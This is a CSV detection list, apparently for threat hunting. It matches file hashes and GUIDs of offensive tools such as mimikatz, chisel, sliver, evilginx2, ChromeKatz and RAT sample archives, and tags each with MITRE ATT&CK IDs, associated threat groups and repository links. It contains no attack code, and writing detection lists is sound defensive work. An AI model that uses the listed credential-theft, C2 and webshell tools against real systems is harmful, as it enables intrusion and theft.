"*17723167fed5ac513f66d4540006dc989d6cf341d43464d241f84daccf889f47*",".{0,1000}17723167fed5ac513f66d4540006dc989d6cf341d43464d241f84daccf889f47.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","#filehash","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","22399"
"*17808f0e8af07a26a574ab7e9e91ceac220d82f44dbc6c06e20a2afefccec418*",".{0,1000}17808f0e8af07a26a574ab7e9e91ceac220d82f44dbc6c06e20a2afefccec418.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","22400"
"*17837e91e3fcfcf19ee77bc80d556e8bf59b411aede445ba030b0f8d0e264b11*",".{0,1000}17837e91e3fcfcf19ee77bc80d556e8bf59b411aede445ba030b0f8d0e264b11.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22401"
"*17893a44c856de700187251711368a3393fa79c92b65d39eb6eb56718a78c255*",".{0,1000}17893a44c856de700187251711368a3393fa79c92b65d39eb6eb56718a78c255.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","22402"
"*17914e2d97784ef7aaf52f9f8b04db77cad036308c6b3584fa0fa172ad1da077*",".{0,1000}17914e2d97784ef7aaf52f9f8b04db77cad036308c6b3584fa0fa172ad1da077.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","22404"
"*17942ccf0a175f0f4d58db7bc010d0c19c18250e1b634f2aba8d91ba6339d829*",".{0,1000}17942ccf0a175f0f4d58db7bc010d0c19c18250e1b634f2aba8d91ba6339d829.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22406"
"*179c7bc7caed085cdfd1db94e54b75dabb2a8943430be82f590143f2b4303b5d*",".{0,1000}179c7bc7caed085cdfd1db94e54b75dabb2a8943430be82f590143f2b4303b5d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22408"
"*179fff5afdfa8e25f3027ed01a226cb8f0b6ebee516ea2fb8f4e6e226235fe61*",".{0,1000}179fff5afdfa8e25f3027ed01a226cb8f0b6ebee516ea2fb8f4e6e226235fe61.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22409"
"*17a1d963e1565ecff5794a685188f34adc40bc12b4f31aa32db53b6956369827*",".{0,1000}17a1d963e1565ecff5794a685188f34adc40bc12b4f31aa32db53b6956369827.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","22410"
"*17a1d963e1565ecff5794a685188f34adc40bc12b4f31aa32db53b6956369827*",".{0,1000}17a1d963e1565ecff5794a685188f34adc40bc12b4f31aa32db53b6956369827.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","22411"
"*17a96dd3f358c5b165d40422c6e218c1b3e9d27182e5202b8d0ad611a874c6d8*",".{0,1000}17a96dd3f358c5b165d40422c6e218c1b3e9d27182e5202b8d0ad611a874c6d8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22413"
"*17b096ff5df1b612abc12887e65fae97280533bfe058ce6becb9c0920f4d4c42*",".{0,1000}17b096ff5df1b612abc12887e65fae97280533bfe058ce6becb9c0920f4d4c42.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22414"
"*17bfe2c77e35c8496b0bbde81bc8d3f5831f0b7f9a4be342a499342a6030fd3e*",".{0,1000}17bfe2c77e35c8496b0bbde81bc8d3f5831f0b7f9a4be342a499342a6030fd3e.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22415"
"*17c3e93b910bc4a48b09772e49f98d877dd870cf81a66697a8d24896bd6a8525*",".{0,1000}17c3e93b910bc4a48b09772e49f98d877dd870cf81a66697a8d24896bd6a8525.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#filehash","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","22416"
"*17c49fde584e67f0cde80e74bdf31d3b7bdfdbef16a93ed41aa6fcc593fed2b2*",".{0,1000}17c49fde584e67f0cde80e74bdf31d3b7bdfdbef16a93ed41aa6fcc593fed2b2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22417"
"*17c82e0a4054f13739f057fbfa1dabfaf6ca373edc46e345d8e5553dfff3dd7d*",".{0,1000}17c82e0a4054f13739f057fbfa1dabfaf6ca373edc46e345d8e5553dfff3dd7d.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","22419"
"*17d97bd15502bc16353e7e06822578069c1e653b031fb4ac982d8cea9d31026f*",".{0,1000}17d97bd15502bc16353e7e06822578069c1e653b031fb4ac982d8cea9d31026f.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","22420"
"*17eb30ef4d91991b265d5d93ab7f4ad6b58d43061a46ba3292142b962be95f7d*",".{0,1000}17eb30ef4d91991b265d5d93ab7f4ad6b58d43061a46ba3292142b962be95f7d.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","22423"
"*17ed9f14af38a0b8442ea9306ba6746746a3d18c2a45ff1647603a95bd4425c8*",".{0,1000}17ed9f14af38a0b8442ea9306ba6746746a3d18c2a45ff1647603a95bd4425c8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22424"
"*17fb52476016677db5a93505c4a1c356984bc1f6a4456870f920ac90a7846180*",".{0,1000}17fb52476016677db5a93505c4a1c356984bc1f6a4456870f920ac90a7846180.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1081 - T1003 - T1555","TA0006 - TA0009","N/A","Kimsuky - XDSpy - TRAVELING SPIDER","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22426"
"*17fb52476016677db5a93505c4a1c356984bc1f6a4456870f920ac90a7846180*",".{0,1000}17fb52476016677db5a93505c4a1c356984bc1f6a4456870f920ac90a7846180.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1081 - T1003 - T1555","TA0006 - TA0009","N/A","Kimsuky - XDSpy - TRAVELING SPIDER","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22427"
"*17FC11E9-C258-4B8D-8D07-2F4125156244*",".{0,1000}17FC11E9\-C258\-4B8D\-8D07\-2F4125156244.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz UUID","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#GUIDproject","uuid","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22428"
"*17fdfc23e6c0f62068cef7a3ab80f40ab5e4d1b9f6b75d983260ee02fd969c6b*",".{0,1000}17fdfc23e6c0f62068cef7a3ab80f40ab5e4d1b9f6b75d983260ee02fd969c6b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22430"
"*17ff8cdd3a77ef0f0106b2b0d8e639f3424ec597c4853a53ebe25433b679707c*",".{0,1000}17ff8cdd3a77ef0f0106b2b0d8e639f3424ec597c4853a53ebe25433b679707c.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#filehash","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","22431"
"*1812fedbe3078c546fb0b59bd0d1ef35110969a49515f3c7fd1a519469d01104*",".{0,1000}1812fedbe3078c546fb0b59bd0d1ef35110969a49515f3c7fd1a519469d01104.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22432"
"*181de17b8aa7917df5d9e610cf2b183d92d84ec9fe4b809303842bd47022e49c*",".{0,1000}181de17b8aa7917df5d9e610cf2b183d92d84ec9fe4b809303842bd47022e49c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22434"
"*18229920a45130f00539405fecab500d8010ef93856e1c5bcabf5aa5532b3311*",".{0,1000}18229920a45130f00539405fecab500d8010ef93856e1c5bcabf5aa5532b3311.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","#filehash","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","22435"
"*1824ED63-BE4D-4306-919D-9C749C1AE271*",".{0,1000}1824ED63\-BE4D\-4306\-919D\-9C749C1AE271.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","#GUIDproject","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","22436"
"*18267a8ff015b5b2e236f8c77a83c6671a651ea1c764f0e1b021aedf33154f83*",".{0,1000}18267a8ff015b5b2e236f8c77a83c6671a651ea1c764f0e1b021aedf33154f83.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22437"
"*1827f84465eaa41ba584561ae108be14e693ba4c992e9d58ef0148959cc9efc1*",".{0,1000}1827f84465eaa41ba584561ae108be14e693ba4c992e9d58ef0148959cc9efc1.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","22438"
"*182e514745c25c47038513979fa80e3744d792f121089cffce1f5de3c5799202*",".{0,1000}182e514745c25c47038513979fa80e3744d792f121089cffce1f5de3c5799202.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22440"
"*182e81c156f653dea62d0aaa97c23887cf99907e16503654bc1fb55405073903*",".{0,1000}182e81c156f653dea62d0aaa97c23887cf99907e16503654bc1fb55405073903.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","22441"
"*1830c05bde7c4d7b795968d4e3c25ecb3dd98763662b1d85fd4abfbbf8e5b660*",".{0,1000}1830c05bde7c4d7b795968d4e3c25ecb3dd98763662b1d85fd4abfbbf8e5b660.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","0","#filehash","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","22442"
"*183c3aa2fd81b6e9b3af4f376d96f57ab6557009d8abe5c6f849f4bb2a0111a9*",".{0,1000}183c3aa2fd81b6e9b3af4f376d96f57ab6557009d8abe5c6f849f4bb2a0111a9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22444"
"*18425e36ae11253b1bfe0a4cd5a291f33709e3199d7598a39fa91efa4b8d70b8*",".{0,1000}18425e36ae11253b1bfe0a4cd5a291f33709e3199d7598a39fa91efa4b8d70b8.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","22446"
"*184c81c9d2a54ae16baadb6f6523e4ae2060c6570682a721f3d977dccfd68a64*",".{0,1000}184c81c9d2a54ae16baadb6f6523e4ae2060c6570682a721f3d977dccfd68a64.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22451"
"*1852b51d64caeda03dba3856a6f691fb80f5a240946fd968d1978f41e7f56fc1*",".{0,1000}1852b51d64caeda03dba3856a6f691fb80f5a240946fd968d1978f41e7f56fc1.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","22452"
"*185ba9d99a4aea0e2f40bd6b6b089ea81c892929fcc91547e2042d180946f320*",".{0,1000}185ba9d99a4aea0e2f40bd6b6b089ea81c892929fcc91547e2042d180946f320.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22454"
"*185d6eb2bb3eeef1bc1737f766942e215342c864bdfd6132c2d55f22a5a10d61*",".{0,1000}185d6eb2bb3eeef1bc1737f766942e215342c864bdfd6132c2d55f22a5a10d61.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","#filehash","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","22455"
"*186789b7b7c4973d4f941582a796c3ced5ae7fbc4527cf19040e740d380c4106*",".{0,1000}186789b7b7c4973d4f941582a796c3ced5ae7fbc4527cf19040e740d380c4106.{0,1000}","offensive_tool_keyword","Stifle",".NET Post-Exploitation Utility for Abusing Explicit Certificate Mappings in ADCS","T1550.003 - T1552.004 - T1606.002","TA0006 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/logangoins/Stifle","1","0","#filehash","N/A","7","2","140","9","2025-02-10T04:58:46Z","2025-02-08T06:13:43Z","22457"
"*1868f166b2b622a3fd8bcb7003527e32700d222d5a8275da4479d04ec991e54c*",".{0,1000}1868f166b2b622a3fd8bcb7003527e32700d222d5a8275da4479d04ec991e54c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22458"
"*186b93ae9e55f25fd6f409914f4e40ef85b92e0bec374fecd8ee293dfd362387*",".{0,1000}186b93ae9e55f25fd6f409914f4e40ef85b92e0bec374fecd8ee293dfd362387.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","22459"
"*187622b4abcd679d2a8b74ba1ea8cec9d517a4026fc58ea7c33ff13ad5c1ca88*",".{0,1000}187622b4abcd679d2a8b74ba1ea8cec9d517a4026fc58ea7c33ff13ad5c1ca88.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","22461"
"*1877E0EC0E657212BF5C9C9170427F7B4D8FDCBED8CFE8FAC388827CE33FDADD*",".{0,1000}1877E0EC0E657212BF5C9C9170427F7B4D8FDCBED8CFE8FAC388827CE33FDADD.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","22462"
"*18800661d2b7b1a4c35b64142ba7dc1aee0268a0b6327be86dd9434539e7c53e*",".{0,1000}18800661d2b7b1a4c35b64142ba7dc1aee0268a0b6327be86dd9434539e7c53e.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","22463"
"*1881deb76eaaf35b1bd0f5c5545cd49b281f3d592610df17417dbd2f071d229b*",".{0,1000}1881deb76eaaf35b1bd0f5c5545cd49b281f3d592610df17417dbd2f071d229b.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","22464"
"*18841fe957995a34a5b74eb0a894cad7ee2c10d1c33f1955c1623279e81b9343*",".{0,1000}18841fe957995a34a5b74eb0a894cad7ee2c10d1c33f1955c1623279e81b9343.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22465"
